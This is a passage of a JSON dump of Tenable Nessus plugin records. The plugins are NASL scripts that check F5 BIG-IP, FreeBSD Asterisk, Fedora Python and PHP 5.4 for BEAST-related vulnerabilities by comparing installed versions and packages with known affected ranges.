Vulnerability.\n (CVE-2012-1870)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://my.f5.com/manage/s/article/K13400\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K13400.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1870\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2011-3389\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/07/17\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nvar sol = 'K13400';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'APM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'ASM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'DNS': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'GTM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'LTM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PEM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PSM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'WOM': {\n 'affected': [\n '17.0.0-17.1.0','16.1.0-16.1.3','15.1.0-15.1.9','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:47", "description": "The Asterisk project reports :\n\nAST-2016-001 - BEAST vulnerability in HTTP server\n\nAST-2016-002 - File descriptor exhaustion in chan_sip\n\nAST-2016-003 - Remote crash vulnerability when receiving UDPTL FAX data", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- Multiple vulnerabilities (559f3d1b-cb1d-11e5-80a4-001999f8d30b) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2016-2232", "CVE-2016-2316"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk13", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_559F3D1BCB1D11E580A4001999F8D30B.NASL", "href": "https://www.tenable.com/plugins/nessus/88584", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88584);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2016-2232\", \"CVE-2016-2316\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"FreeBSD : asterisk -- Multiple vulnerabilities (559f3d1b-cb1d-11e5-80a4-001999f8d30b) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Asterisk project reports :\n\nAST-2016-001 - BEAST vulnerability in HTTP server\n\nAST-2016-002 - File descriptor exhaustion in chan_sip\n\nAST-2016-003 - Remote crash vulnerability when receiving UDPTL FAX\ndata\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2016-001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2016-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2016-003.html\");\n # https://vuxml.freebsd.org/freebsd/559f3d1b-cb1d-11e5-80a4-001999f8d30b.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cbe0f17e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk13\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk<1.8.32.3_5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11<11.21.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk13<13.7.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:23", "description": "Rebase of Python 2 ('python' and 'python-docs') from 2.7.2 to 2.7.3 bringing in security fixes, along with other bugfixes.\n\nSee http://python.org/download/releases/2.7.3/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-05-07T00:00:00", "type": "nessus", "title": "Fedora 16 : python-2.7.3-1.fc16 / python-docs-2.7.3-1.fc16 (2012-5924) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0845", "CVE-2012-1150"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python", "p-cpe:/a:fedoraproject:fedora:python-docs", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-5924.NASL", "href": "https://www.tenable.com/plugins/nessus/58997", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5924.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58997);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0845\", \"CVE-2012-1150\");\n script_bugtraq_id(49778, 51239, 51996);\n script_xref(name:\"FEDORA\", value:\"2012-5924\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Fedora 16 : python-2.7.3-1.fc16 / python-docs-2.7.3-1.fc16 (2012-5924) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Rebase of Python 2 ('python' and 'python-docs') from 2.7.2 to 2.7.3\nbringing in security fixes, along with other bugfixes.\n\nSee http://python.org/download/releases/2.7.3/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.python.org/download/releases/2.7.3/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=750555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=789790\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=812068\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/079978.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16ed5efa\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/079979.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6c0f47e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python and / or python-docs packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"python-2.7.3-1.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"python-docs-2.7.3-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-docs\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:29", "description": "Rebase of Python 2 ('python') from 2.7.2 to 2.7.3, bringing in security fixes, along with numerous other bugfixes.\n\nSee http://python.org/download/releases/2.7.3/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-05-02T00:00:00", "type": "nessus", "title": "Fedora 17 : python-2.7.3-3.fc17 / python-docs-2.7.3-1.fc17 (2012-5892) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0845", "CVE-2012-1150"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python", "p-cpe:/a:fedoraproject:fedora:python-docs", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-5892.NASL", "href": "https://www.tenable.com/plugins/nessus/58956", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5892.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58956);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0845\", \"CVE-2012-1150\");\n script_bugtraq_id(49778, 51239, 51996);\n script_xref(name:\"FEDORA\", value:\"2012-5892\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Fedora 17 : python-2.7.3-3.fc17 / python-docs-2.7.3-1.fc17 (2012-5892) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Rebase of Python 2 ('python') from 2.7.2 to 2.7.3, bringing in\nsecurity fixes, along with numerous other bugfixes.\n\nSee http://python.org/download/releases/2.7.3/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.python.org/download/releases/2.7.3/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=750555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=789790\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=812068\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/079569.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?da059612\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/079570.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c0e5e969\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python and / or python-docs packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"python-2.7.3-3.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"python-docs-2.7.3-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-docs\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:55", "description": "According to its banner, the version of PHP installed on the remote host is 5.4.x earlier than 5.4.0, and, therefore, potentially affected by multiple vulnerabilities :\n\n - crypt_blowfish as used in PHP does not properly handle 8-bit characters, which makes it easier for context-dependent attackers to determine a cleartext password by leveraging knowledge of a password hash.\n (CVE-2011-2483)\n\n - Multiple NULL Pointer Dereference with the zend_strndup() fucntion could allow a remote attacker to cause a denial of service. (CVE-2011-4153)\n\n - A flaw in SSL sockets with SSL 3.0 / TLS 1.0 was addressed. (CVE-2011-3389)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-03-04T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2483", "CVE-2011-3389", "CVE-2011-4153"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_4_0.NASL", "href": "https://www.tenable.com/plugins/nessus/122590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122590);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-2483\", \"CVE-2011-3389\", \"CVE-2011-4153\");\n script_bugtraq_id(49241, 49778, 51417);\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"PHP 5.4.x < 5.4.0 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP installed on the remote\nhost is 5.4.x earlier than 5.4.0, and, therefore, potentially affected\nby multiple vulnerabilities :\n\n - crypt_blowfish as used in PHP does not properly handle\n 8-bit characters, which makes it easier for\n context-dependent attackers to determine a cleartext\n password by leveraging knowledge of a password hash.\n (CVE-2011-2483)\n\n - Multiple NULL Pointer Dereference with the\n zend_strndup() fucntion could allow a remote attacker\n to cause a denial of service. (CVE-2011-4153)\n\n - A flaw in SSL sockets with SSL 3.0 / TLS 1.0 was\n addressed. (CVE-2011-3389)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=55748\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.4.0\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/releases/5_4_0.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.4.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-2483\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5(\\.4)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.4\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.4.x\", port);\n\nif (version =~ \"^5\\.4\\.0(alpha|beta|rc|RC)\")\n{\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.4.0\\n';\n security_report_v4(severity:SECURITY_WARNING, port:port, extra:report);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 